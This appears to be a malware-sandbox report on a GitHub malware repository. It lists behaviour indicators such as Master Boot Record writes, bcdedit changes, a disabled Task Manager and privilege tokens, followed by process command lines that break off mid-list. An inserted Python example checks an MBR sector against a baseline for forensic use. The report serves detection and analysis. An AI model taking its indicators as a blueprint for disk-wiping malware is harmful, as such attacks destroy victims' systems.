Analysis Overview
Threat Level: Likely malicious
The submitted URL https://github.com/pankoza2-pl/malwaredatabase-old was found to be: Likely malicious (the URL was opened in Microsoft Edge; the installer and archive it led to were then executed).
Malicious Activity Summary
Downloads MZ/PE file
Possible privilege escalation attempt
Disables Task Manager via registry modification
Modifies file permissions
Executes dropped EXE
Modifies boot configuration data using bcdedit
Legitimate hosting services abused for malware hosting/C2
Writes to the Master Boot Record (MBR)
Checks installed software on the system
UPX packed file
Drops file in Program Files directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Browser Information Discovery
Delays execution with timeout.exe
Suspicious use of SendNotifyMessage
Kills process with taskkill
Modifies registry class
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
NTFS ADS
Modifies registry key
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-14 07:43
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-14 07:43
Reported
2024-10-14 07:46
Platform
win10v2004-20241007-en
Max time kernel
142s
Max time network
140s
Command Line
Signatures
Disables Task Manager via registry modification
Downloads MZ/PE file
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\TrashMBR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\beeper.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseError.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseWarning.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseAppIcon.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\PlgBlt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseError.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseWarning.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseAppIcon.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\TrashMBR.exe | N/A |
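The indicator above (TrashMBR.exe opening \??\PhysicalDrive0 for modification) is the raw-disk handle a sample needs to overwrite the first sector. What a responder can do with that sector afterwards is shown by the following added example; it is not part of the sandbox report or of the analysed sample. It parses a 512-byte MBR (bootstrap code, disk signature, four partition entries, 0x55AA boot signature), hashes the bootstrap code against a known-good baseline and reports what changed. Both sample sectors are constructed for the example, not captured from the sandbox.

```python
r"""Parse and sanity-check a 512-byte MBR sector.

Added example, not part of the sandbox report or the sample. The report shows
TrashMBR.exe opening \??\PhysicalDrive0 for modification; this shows what a
responder can check once they have the first sector of that disk. The two
sample sectors below are constructed for the example, not captured from the
sandbox.
"""
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_SIGNATURE = b"\x55\xaa"
GPT_PROTECTIVE = 0xEE


def parse_mbr(sector: bytes) -> dict:
    """Split an MBR into bootstrap code, disk signature, partition table and boot signature."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly 512 bytes")
    bootstrap = sector[:440]                       # executable boot code
    disk_sig = struct.unpack("<I", sector[440:444])[0]
    partitions = []
    for i in range(4):
        off = 446 + 16 * i
        # status(1) CHS start(3) type(1) CHS end(3) LBA start(4) sector count(4)
        status, ptype, lba_start, count = struct.unpack("<B3xB3xII", sector[off:off + 16])
        if ptype != 0:                             # type 0 = unused slot
            partitions.append({"index": i, "bootable": status == 0x80,
                               "type": ptype, "lba_start": lba_start, "sectors": count})
    return {
        "bootstrap_sha256": hashlib.sha256(bootstrap).hexdigest(),
        "disk_signature": disk_sig,
        "partitions": partitions,
        "valid_signature": sector[510:512] == BOOT_SIGNATURE,
    }


def check_mbr(sector: bytes, baseline_bootstrap_sha256: str) -> list[str]:
    """Findings against a baseline hash of the known-good bootstrap code."""
    m = parse_mbr(sector)
    findings = []
    if not m["valid_signature"]:
        findings.append("boot signature 0x55AA missing")
    if m["bootstrap_sha256"] != baseline_bootstrap_sha256:
        findings.append("bootstrap code differs from baseline")
    if not m["partitions"]:
        findings.append("partition table empty")
    elif (not any(p["bootable"] for p in m["partitions"])
          and not any(p["type"] == GPT_PROTECTIVE for p in m["partitions"])):
        # A GPT protective MBR (type 0xEE) legitimately has no active partition on UEFI systems.
        findings.append("no active partition")
    return findings


def build_sample_mbr() -> bytes:
    """Constructed known-good MBR: 440 bytes of boot code, one active NTFS partition."""
    bootstrap = b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c" * 55     # 440 bytes
    disk_sig = struct.pack("<I", 0x12345678)
    entry0 = struct.pack("<B3sB3sII", 0x80, b"\x00\x00\x00", 0x07, b"\x00\x00\x00", 2048, 204800)
    table = entry0 + b"\x00" * 48                            # three unused slots
    return bootstrap + disk_sig + b"\x00\x00" + table + BOOT_SIGNATURE


# Constructed "trashed" sector: a jmp-to-self loop, empty partition table, but a
# valid 0x55AA signature, so a signature check alone would not catch it.
TRASHED_MBR = b"\xeb\xfe" + b"\x00" * 508 + BOOT_SIGNATURE


def read_mbr(device: str = r"\\.\PhysicalDrive0") -> bytes:
    """Read the first sector of a raw disk (needs administrator rights on Windows)."""
    with open(device, "rb") as f:
        return f.read(SECTOR_SIZE)


if __name__ == "__main__":
    good = build_sample_mbr()
    baseline = parse_mbr(good)["bootstrap_sha256"]
    print("known-good:", check_mbr(good, baseline))
    print("trashed:   ", check_mbr(TRASHED_MBR, baseline))
```

The baseline hash must come from a sector captured before the incident (a golden image or an earlier forensic acquisition); on a live host, `read_mbr()` opens the same `\\.\PhysicalDrive0` device the report shows the sample opening, which is why reading it requires administrator rights.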
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Ethical Hacking Tools\trojangen.$$A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Ethical Hacking Tools\Uninstal.exe | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| File created | C:\Program Files (x86)\Ethical Hacking Tools\ddostool.$$A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| File created | C:\Program Files (x86)\Ethical Hacking Tools\EthicalHackingTools.$$A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| File created | C:\Program Files (x86)\Ethical Hacking Tools\Form1.$$A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| File created | C:\Program Files (x86)\Ethical Hacking Tools\mbrimage.$$A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| File created | C:\Program Files (x86)\Ethical Hacking Tools\thematrix.$$A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| File created | C:\Program Files (x86)\Ethical Hacking Tools\Uninstal.$$A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| File created | C:\Program Files (x86)\Ethical Hacking Tools\mbrnote.$$A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| File created | C:\Program Files (x86)\Ethical Hacking Tools\msgspammer.$$A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Temp1_ExtremeDeath (1).zip\ExtremeDeath.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\TrashMBR.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseError.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseWarning.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseError.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseWarning.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseAppIcon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\PlgBlt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseAppIcon.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 196939.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\PlgBlt.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Temp1_ExtremeDeath (1).zip\ExtremeDeath.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseError.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseWarning.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseAppIcon.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\PlgBlt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseWarning.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseAppIcon.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseError.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pankoza2-pl/malwaredatabase-old
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaf21a46f8,0x7ffaf21a4708,0x7ffaf21a4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4712 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5612 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5272 /prefetch:8
C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe
"C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6380 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
